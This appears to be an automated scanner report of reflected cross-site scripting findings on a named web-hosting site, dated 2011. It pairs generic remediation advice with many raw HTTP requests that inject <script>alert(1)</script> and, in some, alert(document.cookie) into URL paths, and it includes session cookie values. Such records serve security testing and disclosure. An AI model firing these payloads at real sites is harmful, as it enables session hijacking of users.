Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f32ff<script>alert(1)</script>7818ddc2e64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cssf32ff<script>alert(1)</script>7818ddc2e64/alert.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:02:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19656
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload f151f</title><script>alert(1)</script>80f1673299f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cssf151f</title><script>alert(1)</script>80f1673299f/alert.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:02:28 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /cssf151f</title><script>alert(1)</script>80f1673299f/alert.css on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be33c"><script>alert(1)</script>a88dfa5fc74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cssbe33c"><script>alert(1)</script>a88dfa5fc74/alert.css HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:02:27 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19662
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /cssbe33c"><script>alert(1)</script>a88dfa5fc74/alert.css is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec841<script>alert(1)</script>cf0d492a41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/alert.cssec841<script>alert(1)</script>cf0d492a41 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:02:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f8e3"><script>alert(1)</script>c2a1609e03a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/alert.css8f8e3"><script>alert(1)</script>c2a1609e03a HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:02:31 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19662
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /css/alert.css8f8e3"><script>alert(1)</script>c2a1609e03a is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 39a4a</title><script>alert(1)</script>96543bdd0ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css/alert.css39a4a</title><script>alert(1)</script>96543bdd0ea HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:02:32 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19680
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /css/alert.css39a4a</title><script>alert(1)</script>96543bdd0ea on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f40a<script>alert(1)</script>f872363133e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a<script>alert(1)</script>f872363133e?action=orderpersonalaspclass HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: http://www.arvixe.com/sitefinity_hosting User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:01:47 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 882ae"><script>alert(1)</script>bb1d02b21bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php882ae"><script>alert(1)</script>bb1d02b21bd?action=orderpersonalaspclass HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: http://www.arvixe.com/sitefinity_hosting User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:01:46 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19737
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.php882ae"><script>alert(1)</script>bb1d02b21bd?action=orderpersonalaspclass is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload d754c</title><script>alert(1)</script>9112b65954e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.phpd754c</title><script>alert(1)</script>9112b65954e?action=orderpersonalaspclass HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: http://www.arvixe.com/sitefinity_hosting User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=42204149.959489238.1300298256.1300298256.1300298256.1; __utmc=42204149; __utmb=42204149.1.10.1300298256; arvixeorder=13d4af9c5431de7f7069df4817555a53
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 18:01:48 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19755
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.phpd754c</title><script>alert(1)</script>9112b65954e?action=orderpersonalaspclass on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as text between TITLE tags. The payload 45e1b</title><script>alert(1)</script>d632ed6bd25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C45e1b</title><script>alert(1)</script>d632ed6bd25/js/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:23:55 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C45e1b</title><script>alert(1)</script>d632ed6bd25/js/mootools.js on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 191b9"><script>alert(1)</script>ec543d024d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C191b9"><script>alert(1)</script>ec543d024d9/js/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:23:53 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19821
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C191b9"><script>alert(1)</script>ec543d024d9/js/mootools.js is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37447<script>alert(1)</script>6343c221e28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C37447<script>alert(1)</script>6343c221e28/js/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:23:54 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 382b6</title><script>alert(1)</script>8c55cefcf94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js382b6</title><script>alert(1)</script>8c55cefcf94/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:23:59 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js382b6</title><script>alert(1)</script>8c55cefcf94/mootools.js on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 56331<script>alert(1)</script>3c11bae450e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js56331<script>alert(1)</script>3c11bae450e/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:23:58 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19815
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f17ef"><script>alert(1)</script>c431090e376 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/jsf17ef"><script>alert(1)</script>c431090e376/mootools.js HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:23:57 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19821
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <meta name="description" content="The page /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/jsf17ef"><script>alert(1)</script>c431090e376/mootools.js is not available on Arvixe. Arvixe provides Web Hosting, Linx Web Hosting, ASP .NET Web Hosting, Reseller Web Hosting, Managed Dedicated Servers and E-Commerce Web Hosting" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 8b3b9</title><script>alert(1)</script>163800d7af4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js8b3b9</title><script>alert(1)</script>163800d7af4 HTTP/1.1 Host: www.arvixe.com Connection: keep-alive Referer: https://www.arvixe.com/order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/script%3Ef872363133e?action=orderpersonalaspclass User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=42204149.1300298256.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); arvixeorder=13d4af9c5431de7f7069df4817555a53; __utma=42204149.959489238.1300298256.1300298256.1300301675.2; __utmc=42204149; __utmb=42204149.1.10.1300301675
Response
HTTP/1.1 404 Not Found Date: Wed, 16 Mar 2011 19:24:02 GMT Server: Apache X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding Keep-Alive: timeout=1, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Length: 19839
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<me ...[SNIP]... <title> 404 - Page Not Found - Looking for /order.php8f40a%3Cscript%3Ealert(document.cookie)%3C/js/mootools.js8b3b9</title><script>alert(1)</script>163800d7af4 on Arvixe </title> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 443f0<script>alert(1)</script>3b0580f231a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
